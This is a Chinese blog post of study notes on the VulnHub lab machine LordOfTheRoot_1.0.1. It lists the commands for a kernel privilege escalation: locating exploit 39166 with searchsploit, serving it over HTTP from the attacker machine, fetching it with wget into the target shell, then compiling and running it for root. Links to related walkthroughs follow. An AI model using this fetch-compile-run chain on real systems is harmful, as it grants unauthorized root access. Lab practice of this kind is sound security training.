LordOfTheRoot_1.0.1靶机学习笔记

已于 2022-12-14 22:42:32 修改
阅读量117 收藏
点赞数
分类专栏: 靶场 文章标签: 学习 linux 运维
于 2022-12-14 22:37:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50791426/article/details/128323206
版权

补充

vulnhub靶场内核提权

通过信息收集获得靶机版本:

查找ubuntu 14*版本的内核漏洞:

使用Exploit:

searchsploit 39166 //在kali本地exploit库搜索

locate linux/local/39166.c //查看位置

cp /usr/share/exploitdb/exploits/linux/local/39166.c . //复制到指定目录

python -m SimpleHTTPServer 8081 // 在指定目录打开http服务

wget http://192.168.120.128:8081/39166.c //在shell 里面下载exp

gcc 39166.c -o 39166 //编译exp

./39166 //执行exp可执行文件

成功提权。

参考文章:vulnhub靶场内核提权、udf提权及缓冲区溢出提权 - FreeBuf网络安全行业门户

@阿珂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Redhat 7.6安装GaussDB_100_1.0.1详细攻略
weixin_41365682的博客
05-22 851
Redhat 7.6安装GaussDB_100_1.0.1详细步骤及白名单和开机自启动配置,数据库用户创建及远程登陆
GaussDB_100_1.0.1-DATABASE-REDHAT-64bit.tar.gz
04-14
本篇文章将详细阐述如何在Red Hat Enterprise Linux 64位环境下安装GaussDB 100的1.0.1版本,以及在单机部署中的关键步骤,这些都是基于大量实践和实验的总结。 首先,我们需要准备的是名为"GaussDB_100_1.0.1-...
vulnhub靶场之 LordOfTheRoot_1.0.1
wanan的博客
10-09 989
vulnhub靶场之 LordOfTheRoot_1.0.1
LordOfTheRoot_1.0.1靶机入侵
RestoreJustice的博客
03-15 312
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。下载地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.138。Linux系统中使用.so后缀的,sqlmap中的这两个文件经过了编码,不能直接使用。这里用的是msf里面的。
BOB_1.0.1靶机详解
weixin_44681307的博客
07-29 348
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
VulnHub-Lord Of The Root_1.0.1(打个靶机玩一下)
weixin_44954642的博客
08-08 435
该篇章目的是牢固地基,加强每日训练操作的笔记,在记录笔记中会有很多跳跃性思维的操作和方式方法,大家一起加油,动起来。
vulhub ——LordOfTheRoot_1.0.1
战神/calmness的博客
05-21 281
信息探测 发现22号端口 使用PING 测试进行攻击 hping3 -S 192.168.18.150 -p 1 -c 1 hping3 -S 192.168.18.150 -p 2-c 1 hping3 -S 192.168.18.150 -p 3-c 1 再次进行扫描 root@kali:~# nmap -p- -T5 -A 192.168.18.150 http://192.168.18.150:1337/978345210/index.php 发现存在SQL注入...
vulnhub LordOfTheRoot_1.0.1
m0_64815693的博客
02-21 2418
vulnhub LordOfTheRoot_1.0.1
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1134
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
GaussDB_100_1.0.1部署安装
刘元林的博客
05-08 1471
如果ENABLE_SYSDBA_LOGIN=TRUE,可以免密登录:zsql / as sysdba。zsql sys/Changeme_123@你的IP:1888。# 安装成功后,会自动注册环境变量。# 安装成功后,会自动启动数据库。如下提示,则表示安装成功。
TrollInstallerX_1.0.1_秋名山.ipa
04-08
TrollInstallerX_1.0.1_秋名山.ipa
网件 NETGEAR R6800 固件 V1.2.0.90_1.0.1
04-03
网件 NETGEAR R6800 固件 V1.2.0.90_1.0.1 安全补丁: 修复安全漏洞。
网件 NETGEAR R6800 固件 V1.1.0.42_1.0.1(多国语言版)
04-03
- 如果遇到问题,可查阅官方提供的“Release Notes”(R6800-V1.1.0.42_1.0.1_Release_Notes.html)文件,了解详细变更日志和升级指南。 总的来说,网件(NETGEAR)R6800固件V1.1.0.42_1.0.1的更新旨在提高设备的...
bjrkcydc_22093010_1.0.1_20221031105002_release.apk.1.1.1
11-01
bjrkcydc_22093010_1.0.1_20221031105002_release.apk.1.1.1
Python每日学习
q2903160397的博客
07-21 1955
我是从c++转来学习Python的,总感觉和c++相比Python的实操简单,但是由于写c++的代码多了,感觉Python的语法好奇怪。由于今天是我正式学Python的第一天,干货不多,以后让我们一步一步来见证Python这个优雅的代码的学习之路吧!),这种格式对于我来说已成习惯了,而这一切Python这个优雅的语言通通没有,学习Python这将是道阻且长。今天就简单了解了一下Python的起源和成长并学习了打印 halloworld,算是开始学习了吧。)而且它每一项的代码结束之后要有一个表示结束的封号(
爬虫学习4:爬取王者荣耀技能信息
mohanyelong的博客
07-22 2236
爬取王者荣耀技能信息(代码和代码流程)。
《计算机网络》(学习笔记
qiqi_liuliu的博客
07-24 2301
网络(Network)由若干结点(Node)和连接这些结点的链路(Link)组成多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(互连网)。因此,互联网是"网络的网络(Network of Networks)"因特网(Internet)是世界上最大的互连网络(用TCP/IP)internet是通用名词,互连的网络都叫internet注:互连、自治、集合。在计算机内部或在相邻设备之间近距离传输时,可不经过调制就在信道上直接进行的传输方式称为基带传输。
Linux玩转指南
最新发布
qq_43535970的博客
07-25 967
Linux是一个类Unix操作系统,最初由Linus Torvalds于1991年发布。它是基于开源的内核,并结合了大量的开源软件,形成了完整的操作系统。Linux的设计理念强调开源和自由,使得它在全球范围内得到广泛应用,从个人电脑到服务器、嵌入式系统,甚至超级计算机。
filezilla_server_1.0.1设置
08-08
FileZilla Server 1.0.1 是一个功能强大的FTP服务器软件,用于在计算机或服务器上搭建FTP服务器。以下是关于如何设置FileZilla Server 1.0.1的说明: 1. 下载并安装:首先,从官方网站上下载FileZilla Server 1.0.1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@阿珂

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值